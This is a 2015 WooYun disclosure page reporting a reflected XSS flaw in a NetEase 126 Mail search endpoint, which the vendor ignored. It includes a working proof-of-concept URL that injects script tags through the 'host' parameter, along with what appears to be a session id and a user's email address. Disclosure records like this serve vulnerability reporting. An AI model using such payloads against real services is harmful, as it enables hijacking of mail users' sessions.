网易126邮箱某处XSS跨站漏洞 | wooyun-2015-0121407 | WooYun.org

当前位置：WooYun >> 漏洞信息

漏洞概要关注数(24) 关注此漏洞

缺陷编号：

wooyun-2015-0121407

漏洞标题：

网易126邮箱某处XSS跨站漏洞

相关厂商：

网易

漏洞作者：

路人甲

提交时间：

2015-06-18 17:43

修复时间：

2015-06-23 11:44

公开时间：

2015-06-23 11:44

漏洞类型：

xss跨站脚本攻击

危害等级：

中

自评Rank：

6

漏洞状态：

漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源：

http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：

无

分享漏洞：

>

漏洞详情

披露状态：

2015-06-18：细节已通知厂商并且等待厂商处理中
2015-06-23：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

网易126邮箱某处XSS跨站漏洞

详细说明：

<img src="http://nf.mail.126.com/netfolder/web/search.do?sid=TAnamFQQxGNXovZZqJQQbcoVEYUhapjf&uid=modasoftsz@126.com&host=%3Cscript%3Ealert%28%22xss%22%29%3C/script%3E%3Cscript%3Ealert%28%22hello%20Q1940455934%22%29%3C/script%3E&ver=js5&style=9&skin=cute&color=3e9999#userconsentuserconsent" alt="" />

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

>

漏洞回应

厂商回应：

危害等级：无影响厂商忽略

忽略时间：2015-06-23 11:44

厂商回复：

感谢您对网易的关注！

最新状态：

暂无